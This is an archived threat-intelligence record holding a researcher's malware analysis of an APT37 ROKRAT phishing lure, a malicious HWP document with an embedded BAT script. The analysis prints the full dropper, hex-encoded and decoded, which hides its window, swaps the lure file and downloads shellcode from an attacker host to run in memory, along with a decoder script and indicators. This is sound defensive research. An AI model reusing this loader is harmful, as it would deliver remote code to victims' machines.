{
	"id": "be6a2447-2580-4f96-985b-92fd685e0f91",
	"created_at": "2026-04-06T01:31:00.484466Z",
	"updated_at": "2026-04-10T03:37:40.68867Z",
	"deleted_at": null,
	"sha1_hash": "930cc42115fcbd879cf67403b12c3a3e4e347abe",
	"title": "RE:archive | APT37's ROKRAT HWP Object Linking and Embedding",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 115663,
	"plain_text": "RE:archive | APT37's ROKRAT HWP Object Linking and Embedding\r\nBy Ovi\r\nPublished: 2024-03-01 · Archived: 2026-04-06 00:32:00 UTC\r\nPlease note: the sample covered in this report is from 2022. I have covered it for archiving purposes; it does not pertain to a known recent threat campaign, though the techniques covered may still apply.\r\nRE:archive\r\nThis project aims to cover the reverse engineering of malware and exploits from historic or prior campaigns by APT groups. Of course, where possible, I want to cover malware and exploits from current samples, but sometimes this is not possible: either it is too sensitive to disclose, it was not found in my network of people, or the sample has not been published. So much of the content produced by TI corporations on malware samples is either high-level, abstracted, or does not disclose samples for reverse engineering. Along my travels, I'm often revisiting old samples to understand TTPs or evolutions. Retrohunting, I say, is also retro reverse engineering.\r\nI came across this brief report I wrote back in 2022 and believe it can be valuable, so I am sharing it publicly. Based on my experience analysing this threat actor, this sample is related to APT37's ROKRAT operations. I have previously written about ROKRAT impacting Android devices here; this campaign, however, specifically targeted Windows devices. In some previous analysis within this project, I also covered the GOLDBACKDOOR dropper malware.\r\nAPT37 \u0026 HWP Object Linking and Embedding\r\nThis is a short report detailing a sample analysis from 2022. The sample covered in this report:\r\n5fec6e533fb9741997530a3d43b60ee44e2e6dc0fd443ef135b9d311b73d92a8\r\nAPT37 is an advanced persistent threat group attributed to the North Korean government. 
It has been active since at least 2012 and is known for conducting espionage operations primarily targeting South Korea, Japan, and other neighboring countries, although it has also been observed targeting entities worldwide.\r\nAPT37 is notable for its advanced capabilities and its use of a wide range of attack techniques, including spear-phishing, malware deployment, and zero-day exploits. The group has been linked to numerous high-profile attacks, including the targeting of non-profit groups, government agencies, defense contractors, media organizations, and financial institutions.\r\nOne of APT37's primary objectives appears to be gathering intelligence on political and military issues in the region, as well as stealing intellectual property and conducting disruptive or destructive cyber operations. The group has been known to use a variety of malware tools, including remote access trojans (RATs) such as ROKRAT.\r\nhttps://www.0x0v1.com/rearchive-rokrat-hwp/\r\nPage 1 of 10\r\nAPT37's activities are believed to be coordinated and supported by the North Korean government, although the exact relationship between the group and the state remains somewhat unclear.\r\nFor many researchers, APT37's HWP object linking and embedding document lures are well understood. However, for archiving purposes, this report covers a 2022 version of the campaign in granular detail. Malicious HWP (Hangul Word Processor) Object Linking and Embedding (OLE) documents are HWP files in which attackers embed harmful content or code using OLE technology. 
HWP is a popular word processor in South Korea, developed by Hancom Inc., and OLE is a technology that allows objects (such as documents, images, or multimedia) to be embedded in or linked from one application to another.\r\nIn the context of cyberattacks, attackers may exploit vulnerabilities in HWP software or use social engineering to trick users into opening malicious HWP documents. Once opened, these documents can execute embedded scripts, launch malware, or exploit system vulnerabilities, potentially leading to data theft, system compromise, or further infiltration into the victim's network.\r\nThreat report\r\nSubject: 제20대_대통령선거_선거권자_개표참관인_공개_모집(최종)\r\nTranslated subject: 20th_Presidential_Election_Eligible_Voters_Vote_Count_Observer_Open_Recruitment(Final)\r\nSender: 중앙선거관리위원회 공보과 (kopo1scom98@daum.net)\r\nTranslated sender: Public Information Division, National Election Commission\r\nDiamond model breakdown:\r\nAdversary: APT37\r\nPersona: kopo1scom98\r\nOrigin: NK\r\nGroup: Characteristics of APT37 \u0026 Kimsuky\r\nVictim: Human rights NGO\r\nCapability: HWP Object Linking and Embedding, BAT scripts, PowerShell in-memory shellcode loader (labelled reflective DLL injection in the original 2022 report)\r\nInfrastructure:\r\n- https://[.]work3[.]b4a[.]app/\r\n- Amazon-hosted stager 52.87.80.2; observed response:\r\nHTTP/1.1 401 Unauthorized\r\nDate: Mon, 08 Aug 2022 14:14:49 GMT\r\nContent-Type: application/json; charset=utf-8\r\nContent-Length: 24\r\nConnection: keep-alive\r\nX-Powered-By: Express\r\nETag: W/\"18-gH7/fIZxPCVRh6TuPVNAgHt/40I\"\r\n- JARM: \"29d29d00029d29d00029d29d29d29d4d0c5eed338ce212ffe821a67732ded8\" (very generic [Amazon] fingerprint, not to be used for specific attribution)\r\nBody:\r\n중앙선거관리위원회는 제20대 대통령선거 개표상황을 참관할 개표참관인을 2월 8일부터 12일까지 공개 모집한다.\r\n개표참관인은 개표소 안에서 개표상황을 언제든지 순회·감시 또는 촬영할 수 있고, 개표에 관한 위법사항을 발견한 때에는 시정을 요구할 수 있다.\r\n개표참관인 공개 모집은 개표절차의 투명성을 높이기 위해 2016년 제20대 국회의원선거부터 실시하고 있는 제도이다.\r\n개표참관인이 되려는 사람은 중앙선관위 
홈페이지(www.nec.go.kr)에서 본인 인증 후 신청서를 작성하거나, 주소지 관할 구·시·군선관위에 서면으로 신청하면 된다.\r\n선거권이 있는 사람은 누구나 신청할 수 있지만, 대한민국 국민이 아니거나 미성년자(18세 미만인 자), 공무원 등 「공직선거법」에서 제한하고 있는 사람은 개표참관인이 될 수 없다.\r\nTranslated body:\r\n“The National Election Commission will openly recruit vote counting observers to observe the counting of the 20th presidential election from February 8 to 12. Counting observers may circulate, monitor, or take pictures of the counting situation at any time inside the counting station, and when they discover any illegality regarding the counting, they may request correction. The open recruitment of vote counting observers is a system that has been implemented since the 20th National Assembly election in 2016 to enhance the transparency of the ballot counting process. Those wishing to become a ballot counting observer can either fill out an application form after verifying their identity on the website of the National Election Commission (www.nec.go.kr), or apply in writing to the Gu/Si/Gun Election Commission having jurisdiction over their address. Anyone with the right to vote can apply, but non-Korean citizens, minors (those under the age of 18), public officials and others restricted under the Public Official Election Act cannot become counting observers.”\r\nSummary:\r\nThe email contains an HWP document with an embedded OLE object in the form of a BAT script. Once the user clicks on the OLE object, the BAT script executes and launches a PowerShell stage that downloads shellcode and runs it in memory on the victim's machine (the original 2022 report called this reflective DLL injection; the script itself never maps a DLL, it allocates a buffer, marks it executable and starts a thread on it, so any reflective loading would happen inside the downloaded shellcode). The payload is loaded into memory from:\r\nhttps://[.]work3[.]b4a[.]app/\r\nBecause the operation loads malicious code directly into memory, it leaves few artefacts on disk, generates little noise, and lets the attacker stay relatively stealthy.\r\nAnalysis Details:\r\nThe attached HWP document contains an OLE object (a batch file) that runs when activated. A text prompt in the document is designed to get the user to click it. 
Once clicked, the BAT script executes. It is as follows:\r\nFilename: 327.bat\r\nSHA256: 5fec6e533fb9741997530a3d43b60ee44e2e6dc0fd443ef135b9d311b73d92a8\r\n@echo off\r\nIF EXIST \"%PROGRAMFILES(X86)%\" (set pspath=\"%windir%\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe\")\r\nELSE (set pspath=\"%windir%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\")\r\nstart \"\" %pspath% -command \"$ttms=\"$eruk2=\"\"\"\"246B6B79343D275B446C6C496D706F727428227573657233322E646C6C22295D2\r\n07075626C6963207374617469632065787465726E20626F6F6C2053686F7757696E646F7728696E742068616E646C652C20696E742073746\r\n17465293B273B246D6D79343D4164642D54797065202D4D656D626572446566696E6974696F6E20246B6B7934202D4E616D6520226B6B793\r\n422202D50617373546872753B246D6D79343A3A53686F7757696E646F7728285B53797374656D2E446961676E6F73746963732E50726F636\r\n573735D3A3A47657443757272656E7450726F636573732829207C204765742D50726F63657373292E4D61696E57696E646F7748616E646C6\r\n52C2030293B246179343D4765742D576D694F626A6563742057696E33325F50726F63657373202D66696C74657220224E616D65206C696B6\r\n520274877702527223B246279343D246179342E4E616D653B246379343D246179342E436F6D6D616E644C696E653B69662824627934297B2\r\n46479343D222F63207461736B6B696C6C202F66202F696D20222B246279343B636D6420246479343B776169742D70726F636573732024627\r\n9342E53706C697428275C2E27295B2D325D3B246579343D246379342E53706C697428272227292E636F756E743B696628246379345B305D2\r\n02D657120272227297B69662824657934202D65712033297B246679343D246379342E53706C697428272227295B325D2E53706C697428272\r\n027295B315D3B7D656C736569662824657934202D65712035297B246679343D246379342E53706C697428272227295B335D3B7D7D656C736\r\n57B69662824657934202D65712033297B246679343D246379342E53706C697428272227295B315D3B7D656C73657B246679343D246379342\r\nE53706C697428272027295B315D3B7D7D246779343D222222222B24656E763A54454D502B225C68686272676F66362E746D70222B2222222\r\n23B246879343D222222222B24656E763A54454D502B225C33323
72E626174222B222222223B246979343D222222222B246679342B2222222\r\n23B246479343D222F6320636F7079202F7920222B246779342B2220222B246979343B24706579343D303B24707379343D2730273B646F7B2\r\n4706579342B2B3B24707379343D636D6420246479343B736C65657020313B6966282470657934202D65712035297B627265616B3B7D7D776\r\n8696C652824707379342E5472696D28295B305D202D6E6520273127293B737461727420246979343B7D246A79343D22636D64202F6320646\r\n56C202F6620222B20246779343B636D6420246A79343B246A79343D22636D64202F632064656C202F6620222B20246879343B636D6420246\r\nA79343B5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A5\r\n46F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B246C79343D275B446C6C496D706\r\nF727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6\r\nC6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246C7934202\r\nD4E616D6520224141412220202D50617373546872753B246D7934203D20275B446C6C496D706F727428226B65726E656C33322E646C6C222\r\n95D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E742\r\n0622C75696E7420632C6F757420496E745074722064293B273B246B79343D4164642D54797065202D4D656D626572446566696E6974696F6\r\nE20246D7934202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E5\r\n76562436C69656E743B24643D2268747470733A2F2F776F726B332E6234612E6170702F646F776E6C6F61642E68746D6C3F69643D3838267\r\n365617263683D545568334D3078455A334E50517A52345445524664325A48536E5A61534774315A45644761574A485658464C617A6B77595\r\n5645765575A4965476C694D6C49315447355361466C746547773D223B246E79343D275B446C6C496D706F727428226B65726E656C33322E6\r\n46C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C7\r\n5696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E7450747220662
93B273B247179343D4164642D5479706\r\n5202D4D656D626572446566696E6974696F6E20246E7934202D4E616D65202242424222202D50617373546872753B246F79343D275B446C6\r\nC496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220576169744\r\n66F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B247479343D4164642D54797065202D4D656D6265724\r\n46566696E6974696F6E20246F7934202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2\r\n024632E486561646572735B22757365722D6167656E74225D203D2022757575757575757575223B247079343D24632E446F776E6C6F61644\r\n4617461282464293B24757934203D2024623A3A476C6F62616C416C6C6F63283078303034302C20247079342E4C656E6774682B307831303\r\n0293B24727934203D20303B246B79343A3A5669727475616C50726F7465637428247579342C20247079342E4C656E6774682B30783130302\r\nC20307834302C205B7265665D24727934293B666F7220282468203D20303B2468202D6C7420247079342E4C656E6774683B24682B2B29207\r\nB5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282475793\r\n42C2024682C20247079345B24685D293B7D3B7472797B7468726F7720313B7D63617463687B247379343D247179343A3A437265617465546\r\n87265616428302C302C247579342C302C302C30293B247479343A3A57616974466F7253696E676C654F626A65637428247379342C2035303\r\n02A31303030293B7D3B24653D3232323B7D63617463687B736C65657020323B24652B2B3B7D7D7768696C65282465202D6C7420313134293B\"\"\"\";\r\n$blwp=\"\"\"\"\"\";\r\nfor($i=0;$i -le $eruk2.Length-2;$i=$i+2){$NTMO=$eruk2[$i]+$eruk2[$i+1];$blwp= $blwp+[char]([convert]::toint16($NTMO,16));};\r\nInvoke-Command -ScriptBlock ([Scriptblock]::Create($blwp));\";\r\nInvoke-Command -ScriptBlock ([Scriptblock]::Create($ttms));\"\r\nTwo things stand out in the batch file. On 64-bit Windows the IF EXIST \"%PROGRAMFILES(X86)%\" test is true, so it deliberately launches the 32-bit PowerShell under syswow64; the stage that follows, and the shellcode it loads, therefore run as a 32-bit process. The PowerShell command is also two layers deep: $ttms is a string holding a loop that turns the hex in $eruk2 back into text two characters at a time and runs the result with Invoke-Command, and $ttms is itself executed by the final Invoke-Command, so the command line shows nothing but hex and the real stage only appears once the inner script block is created.\r\nThese campaigns can be decoded quickly using the following script I created, which decodes the hex and allows for further payload extraction. 
It simply decodes the hexadecimal values in the input with the extract_hexadecimal_value function, converting each byte into an ASCII character, prints the result, lists any URLs in the decoded text and optionally pulls the payload from them using the same User-Agent the stage sends. Note that the standard library cannot write password-protected zips, so the archive it produces is not encrypted.\r\n# Script to quickly decode the powershell encoded commands in ROKRAT delivery files.\r\n# It will allow the user to quickly see the decoded result, extract the payload delivery host and have the optio\r\n# @0v1@infosec.exchange\r\n# 0x0v1.com\r\nimport re\r\nimport zipfile\r\n\r\nimport requests\r\n\r\n\r\ndef extract_hexadecimal_value(userinput):\r\n    # Drop anything that is not a hex digit first: the blob is usually pasted\r\n    # out of a PDF or a ScriptBlock log and carries line wraps and stray spaces.\r\n    hexdata = re.sub(r\"[^0-9A-Fa-f]\", \"\", userinput)\r\n    # Same walk as the PowerShell loop ($i -le Length-2). range() is exclusive,\r\n    # so the bound is len-1; with len-2 the final byte would be dropped.\r\n    bulst = \"\"\r\n    for i in range(0, len(hexdata) - 1, 2):\r\n        NTMO = hexdata[i:i + 2]\r\n        bulst += chr(int(NTMO, 16))\r\n    return bulst\r\n\r\n\r\ndef extract_urls(text):\r\n    pattern = r'https?://[^\\s\"\\']+'\r\n    return re.findall(pattern, text)\r\n\r\n\r\ndef download_payload(url):\r\n    # The decoded stage sets this User-Agent before DownloadData(); mirror it,\r\n    # since stagers often serve the payload only to the expected UA.\r\n    headers = {\"User-Agent\": \"uuuuuuuuu\"}\r\n    response = requests.get(url, headers=headers, timeout=30)\r\n    if response.status_code == 200:\r\n        return response.content\r\n    print(f\"\\033[91mFailed to download the payload (HTTP {response.status_code}).\\033[0m\")\r\n    return None\r\n\r\n\r\ndef zip_payload(payload, filename):\r\n    # zipfile cannot write encrypted archives; setpassword() only applies to\r\n    # extraction, so this zip is NOT password-protected. Handle it in a sandbox\r\n    # or re-pack it with a tool that supports AES-encrypted zips.\r\n    with zipfile.ZipFile(filename, \"w\", zipfile.ZIP_DEFLATED) as zip_file:\r\n        zip_file.writestr(\"payload.bin\", payload)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    userinput = input(\"Enter the encoded command: \")\r\n    value = extract_hexadecimal_value(userinput)\r\n    print(\"\\033[93mThe decoded command is:\\033[0m\")\r\n    print(value)\r\n    urls = extract_urls(value)\r\n    if urls:\r\n        print(\"\\n\\033[93mExtracted URLs:\\033[0m\")\r\n        for idx, url in enumerate(urls, start=1):\r\n            print(f\"{idx}. {url}\")\r\n        choice = input(\"\\n\\033[96mDo you want to pull the payload? (yes/no):\\033[0m \").strip().lower()\r\n        if choice == \"yes\":\r\n            print(\"\\n\\033[91mWARNING: You are about to download the raw shellcode from the payload delivery URL.\\033[0m\")\r\n            confirm = input(\"\\033[96mDo you wish to continue? (yes/no):\\033[0m \").strip().lower()\r\n            if confirm == \"yes\":\r\n                for idx, url in enumerate(urls, start=1):\r\n                    payload = download_payload(url)\r\n                    if payload:\r\n                        filename = f\"payload_{idx}.zip\"\r\n                        zip_payload(payload, filename)\r\n                        print(f\"\\033[92mPayload downloaded and zipped to {filename}.\\033[0m\")\r\n                    else:\r\n                        print(\"\\033[91mFailed to download the payload.\\033[0m\")\r\n            else:\r\n                print(\"\\033[91mDownload aborted.\\033[0m\")\r\n        else:\r\n            print(\"\\033[91mDownload aborted.\\033[0m\")\r\n    else:\r\n        print(\"\\n\\033[93mNo URLs found in the value.\\033[0m\")\r\nThe decoded output looks like this:\r\n$kky4='[DllImport(\"user32.dll\")] public static extern bool ShowWindow(int handle, int state);';\r\n$mmy4=Add-Type -MemberDefinition $kky4 -Name \"kky4\" -PassThru;\r\n$mmy4::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0);\r\n$ay4=Get-WmiObject Win32_Process -filter \"Name like 'Hwp%'\";\r\n$by4=$ay4.Name;\r\n$cy4=$ay4.CommandLine;\r\nif($by4){$dy4=\"/c taskkill /f /im \"+$by4;\r\ncmd $dy4;\r\nwait-process $by4.Split('\\.')[-2];\r\n$ey4=$cy4.Split('\"').count;if($cy4[0] -eq '\"')\r\n{if($ey4 -eq 3){$fy4=$cy4.Split('\"')[2].Split(' ')[1];}\r\nelseif($ey4 -eq 5){$fy4=$cy4.Split('\"')[3];}}\r\nelse{\r\nif($ey4 -eq 3){$fy4=$cy4.Split('\"')[1];}\r\nelse{$fy4=$cy4.Split(' ')[1];}}\r\n$gy4=\"\"\"\"+$env:TEMP+\"\\hhbrgof6.tmp\"+\"\"\"\";\r\n$hy4=\"\"\"\"+$env:TEMP+\"\\327.bat\"+\"\"\"\";\r\n$iy4=\"\"\"\"+$fy4+\"\"\"\";\r\n$dy4=\"/c copy /y \"+$gy4+\" \"+$iy4;$pey4=0;\r\n$psy4='0';\r\ndo{\r\n$pey4++;\r\n$psy4=cmd $dy4;\r\nsleep 1;\r\nif($pey4 -eq 5)\r\n{break;}}\r\nwhile($psy4.Trim()[0] -ne '1');\r\nstart $iy4;}\r\n$jy4=\"cmd /c del /f \"+ $gy4;\r\ncmd $jy4;\r\n$jy4=\"cmd /c del /f \"+ $hy4;\r\ncmd $jy4;\r\n[Net.ServicePointManager]::SecurityProtocol=[Enum]::ToObject([Net.SecurityProtocolType], 3072);\r\n$ly4='[DllImport(\"kernel32.dll\")]public static 
extern IntPtr GlobalAlloc(uint b,uint c);';\r\n$b=Add-Type -MemberDefinition $ly4 -Name \"AAA\" -PassThru;\r\n$my4 = '[DllImport(\"kernel32.dll\")]public static extern bool VirtualProtect(IntPtr a,uint b,uint c,out IntPtr d);';\r\n$ky4=Add-Type -MemberDefinition $my4 -Name \"AAB\" -PassThru;\r\n$c = New-Object System.Net.WebClient;\r\n$d=\"https://work3.b4a.app/download.html?id=88\u0026search=TUh3M0xEZ3NPQzR4TERFd2ZHSnZaSGt1ZEdGaWJHVXFLazkwYUdWeWZIeGliMlI1TG5SaFlteGw=\";\r\n$ny4='[DllImport(\"kernel32.dll\")]public static extern IntPtr CreateThread(IntPtr a,uint b,IntPtr c,IntPtr d,uint e,IntPtr f);';\r\n$qy4=Add-Type -MemberDefinition $ny4 -Name \"BBB\" -PassThru;\r\n$oy4='[DllImport(\"kernel32.dll\")]public static extern IntPtr WaitForSingleObject(IntPtr a,uint b);';\r\n$ty4=Add-Type -MemberDefinition $oy4 -Name \"DDD\" -PassThru;\r\n$e=112;\r\ndo {\r\ntry { $c.Headers[\"user-agent\"] = \"uuuuuuuuu\";\r\n$py4=$c.DownloadData($d);\r\n$uy4 = $b::GlobalAlloc(0x0040, $py4.Length+0x100);\r\n$ry4 = 0;\r\n$ky4::VirtualProtect($uy4, $py4.Length+0x100, 0x40, [ref]$ry4);\r\nfor ($h = 0;$h -lt $py4.Length;$h++) {[System.Runtime.InteropServices.Marshal]::WriteByte($uy4, $h, $py4[$h]);};\r\ntry{throw 1;}\r\ncatch{$sy4=$qy4::CreateThread(0,0,$uy4,0,0,0);\r\n$ty4::WaitForSingleObject($sy4, 500*1000);};$e=222;}\r\ncatch{sleep 2;$e++;}}while($e -lt 114);\r\nA very similar sample is described here: Malicious HWP Files with BAT Scripts Being Distributed Actively (North Korea/National Defense/Broadcasting) - ASEC BLOG (ahnlab.com)\r\nAt the time of writing, the shellcode stager was down, so I was unable to pull the shellcode that is loaded into memory from:\r\nhttps://work3.b4a.app/download.html?id=88\u0026search=TUh3M0xEZ3NPQzR4TERFd2ZHSnZaSGt1ZEdGaWJHVXFLazkwYUdWeWZIeGliMl\r\nThe sample uses the Add-Type cmdlet to add class definitions. 
First it defines a class called kky4 that imports user32!ShowWindow and uses it to hide the PowerShell console window (state 0 is SW_HIDE), so the victim sees nothing after clicking the OLE object:\r\n$kky4='[DllImport(\"user32.dll\")] public static extern bool ShowWindow(int handle, int state);';\r\n$mmy4=Add-Type -MemberDefinition $kky4 -Name \"kky4\" -PassThru;\r\n$mmy4::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0)\r\nWhen Add-Type -MemberDefinition is executed by Windows PowerShell 5.1 (the WindowsPowerShell\\v1.0 path the batch file targets; PowerShell 7 compiles in-process with Roslyn and spawns no compiler), csc.exe (the Visual C# command-line compiler) is invoked on the host by PowerShell to compile the class definition into an assembly for the script to use. This is a notable TTP to observe on victims (powershell.exe → csc.exe → cvtres.exe). The compiler's response file, source file and output assembly are written to a random-named directory under %LOCALAPPDATA%\\Temp (%TEMP%), the response file carrying the extension .cmdline. In this case, our sample creates C:\\Users\\Louise\\AppData\\Local\\Temp\\uzicvxsd\\uzicvxsd.cmdline:\r\n/t:library /utf8output /R:\"System.dll\" /R:\"C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll\" /R:\"System.Core.dll\" /out:\"C:\\Users\\Louise\\AppData\\Local\\Temp\\uzicvxsd\\uzicvxsd.dll\" /debug- /optimize+ /warnaserror /optimize+ \"C:\\Users\\Louise\\AppData\\Local\\Temp\\uzicvxsd\\uzicvxsd.0.cs\"\r\nSince these files are removed as soon as Add-Type finishes, the methodology leaves a relatively small footprint on disk, which supports the attacker's evasion; catching it relies on process-creation and file-creation telemetry recorded at the time (for example Sysmon event IDs 1 and 11, or PowerShell script block logging) rather than a later disk review. The script uses WMI (Get-WmiObject Win32_Process) to find the running Hwp process and kill it. This is a notable pattern since it is not common. 
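The command-line parsing that follows the taskkill is compact but handles four shapes of Hwp.exe command line. The Python below is an added re-implementation of that logic (it is not code from the original report or from the sample) so each branch can be checked against constructed command lines; the paths are invented for illustration.

```python
# Added re-implementation of the decoded stage's document-path recovery (mirrors
# the $ey4/$fy4 branches); not code from the original report or the sample.
# Sample command lines below are constructed for illustration.

def recover_document_path(cmdline):
    """Return the document path the decoded stage would extract from a
    Win32_Process.CommandLine value for Hwp.exe, or None if the shape is
    one the script does not handle.

    $ey4 = number of pieces after splitting on '"'
    $fy4 = the recovered path (what gets overwritten and re-opened)
    """
    parts = cmdline.split('"')          # $cy4.Split('"')
    n = len(parts)                      # .count
    if cmdline.startswith('"'):         # $cy4[0] -eq '"'  (quoted exe path)
        if n == 3:                      # "C:\...\Hwp.exe" C:\doc.hwp
            tail = parts[2].split(" ")  # [2].Split(' ')[1]
            return tail[1] if len(tail) > 1 and tail[1] else None
        if n == 5:                      # "C:\...\Hwp.exe" "C:\my doc.hwp"
            return parts[3]             # [3]
        return None                     # no branch in the script: $fy4 stays $null
    if n == 3:                          # Hwp.exe "C:\my doc.hwp"
        return parts[1]                 # [1]
    tokens = cmdline.split(" ")         # Hwp.exe C:\doc.hwp
    return tokens[1] if len(tokens) > 1 and tokens[1] else None


# Constructed examples covering each branch, plus two shapes worth knowing about.
SAMPLE_CMDLINES = {
    "quoted_exe_bare_doc":   r'"C:\Program Files\Hnc\Hwp.exe" C:\Users\u\Desktop\lure.hwp',
    "quoted_exe_quoted_doc": r'"C:\Program Files\Hnc\Hwp.exe" "C:\Users\u\Desktop\20th election.hwp"',
    "bare_exe_quoted_doc":   r'Hwp.exe "C:\Users\u\Desktop\20th election.hwp"',
    "bare_exe_bare_doc":     r'Hwp.exe C:\Users\u\Desktop\lure.hwp',
    # Hwp started with no document: n == 3 but the tail is empty, $fy4 stays $null
    "no_document":           r'"C:\Program Files\Hnc\Hwp.exe"',
    # an extra switch between exe and document still yields n == 5, so it works
    "extra_switch":          r'"C:\Program Files\Hnc\Hwp.exe" /x "C:\a b.hwp"',
}


def run_samples():
    """Map each sample name to the path the script would recover."""
    return {name: recover_document_path(c) for name, c in SAMPLE_CMDLINES.items()}


if __name__ == "__main__":
    for name, path in run_samples().items():
        print(f"{name:24s} -> {path}")
```

The branches assume exactly one matching process: Get-WmiObject returns an array when several Hwp.exe instances are running, and the string operations on $cy4 then no longer behave as the author of the script intended.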
Having killed Hwp, it waits for the process to exit (wait-process on the image name without its extension), then parses the document path out of the captured Win32_Process.CommandLine: the number of pieces produced by splitting on double quotes tells it whether the executable and/or the document path were quoted, and $fy4 ends up holding the path of the lure the victim had open. It then copies hhbrgof6.tmp from %TEMP% over that document (retrying up to five times, one second apart, until copy reports \"1 file(s) copied\"), reopens the document with start so the victim sees an ordinary file, and finally deletes both hhbrgof6.tmp and 327.bat. The contents of hhbrgof6.tmp are not covered in this report, but the flow is consistent with swapping the weaponised lure for a clean copy. Note that the logic assumes a single Hwp process: with several, $ay4 becomes an array and the string parsing no longer behaves as written.\r\n$ay4=Get-WmiObject Win32_Process -filter \"Name like 'Hwp%'\";\r\n$by4=$ay4.Name;\r\n$cy4=$ay4.CommandLine;\r\nif($by4){$dy4=\"/c taskkill /f /im \"+$by4;\r\ncmd $dy4;\r\nwait-process $by4.Split('\\.')[-2];\r\n$ey4=$cy4.Split('\"').count;if($cy4[0] -eq '\"')\r\n{if($ey4 -eq 3){$fy4=$cy4.Split('\"')[2].Split(' ')[1];}\r\nelseif($ey4 -eq 5){$fy4=$cy4.Split('\"')[3];}}\r\nelse{\r\nif($ey4 -eq 3){$fy4=$cy4.Split('\"')[1];}\r\nelse{$fy4=$cy4.Split(' ')[1];}}\r\n$gy4=\"\"\"\"+$env:TEMP+\"\\hhbrgof6.tmp\"+\"\"\"\";\r\n$hy4=\"\"\"\"+$env:TEMP+\"\\327.bat\"+\"\"\"\";\r\n$iy4=\"\"\"\"+$fy4+\"\"\"\";\r\n$dy4=\"/c copy /y \"+$gy4+\" \"+$iy4;\r\n$pey4=0;\r\n$psy4='0';\r\ndo{\r\n$pey4++;\r\n$psy4=cmd $dy4;\r\nsleep 1;\r\nif($pey4 -eq 5)\r\n{break;}}\r\nwhile($psy4.Trim()[0] -ne '1');\r\nstart $iy4;}\r\n$jy4=\"cmd /c del /f \"+ $gy4;\r\ncmd $jy4;\r\n$jy4=\"cmd /c del /f \"+ $hy4;\r\ncmd $jy4;\r\nThey then force TLS 1.2 for the download (3072 is the numeric value of [Net.SecurityProtocolType]::Tls12):\r\n[Net.ServicePointManager]::SecurityProtocol=[Enum]::ToObject([Net.SecurityProtocolType], 3072)\r\nThis is followed by the creation of additional classes, this time importing kernel32 in order to access GlobalAlloc and VirtualProtect:\r\n$ly4='[DllImport(\"kernel32.dll\")]public static extern IntPtr GlobalAlloc(uint b,uint c);';\r\n$b=Add-Type -MemberDefinition $ly4 -Name \"AAA\" -PassThru;\r\n$my4 = '[DllImport(\"kernel32.dll\")]public static extern bool VirtualProtect(IntPtr a,uint b,uint c,out IntPtr d);';\r\n$ky4=Add-Type -MemberDefinition $my4 -Name \"AAB\" -PassThru;\r\nThe stager URL is assigned to $d, and the WebClient is given the User-Agent \"uuuuuuuuu\" before the download; that static, meaningless UA is a usable network indicator for this stage.\r\nIt then allocates memory for the shellcode with GlobalAlloc (0x0040 is GMEM_ZEROINIT), padding the buffer by 0x100 bytes:\r\n$uy4 = $b::GlobalAlloc(0x0040, $py4.Length+0x100)\r\nFollowed by VirtualProtect to make the region executable (0x40 is PAGE_EXECUTE_READWRITE):\r\n$ky4::VirtualProtect($uy4, $py4.Length+0x100, 0x40, 
[ref]$ry4);\r\nLastly, it writes the downloaded bytes into the buffer one at a time with Marshal::WriteByte, creates a thread whose start address is the buffer with CreateThread, and calls WaitForSingleObject to wait up to 500*1000 ms (a little over eight minutes) for the thread to end. The CreateThread call sits inside a try{throw 1;}catch{...} block, so the thread is started from within an exception handler, an oddity to keep in mind when emulating the script. The outer do/while retries the whole download-and-execute sequence: $e starts at 112, a failure sleeps two seconds and increments it, success sets it to 222, and the loop stops once $e reaches 114, so a failed download is attempted twice before the script gives up.\r\nfor ($h = 0;$h -lt $py4.Length;$h++) {[System.Runtime.InteropServices.Marshal]::WriteByte($uy4, $h, $py4[$h]);};\r\ntry{throw 1;}\r\ncatch{$sy4=$qy4::CreateThread(0,0,$uy4,0,0,0);\r\n$ty4::WaitForSingleObject($sy4, 500*1000);};\r\n$e=222;}\r\ncatch{sleep 2;$e++;}}\r\nwhile($e -lt 114);\r\nUnfortunately, since the shellcode stager is down, no further analysis can be conducted on the shellcode loaded into memory. On completion, the malicious shellcode is executed in memory. This infrastructure was later seen deploying ROKRAT samples, so I am assuming here that the shellcode would have resulted in ROKRAT, given my experience with this threat actor.\r\nBlog of researcher \u0026 writer Ovi. Disrupting APTs, hostile gov'ts, surveillance, privacy violations, centralization \u0026 corporate injustice.\r\nSource: https://www.0x0v1.com/rearchive-rokrat-hwp/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.0x0v1.com/rearchive-rokrat-hwp/"
	],
	"report_names": [
		"rearchive-rokrat-hwp"
	],
	"threat_actors": [
		{
			"id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e",
			"created_at": "2025-08-07T02:03:25.082908Z",
			"updated_at": "2026-04-10T02:00:03.744649Z",
			"deleted_at": null,
			"main_name": "NICKEL FOXCROFT",
			"aliases": [
				"APT37 ",
				"ATK4 ",
				"Group 123 ",
				"InkySquid ",
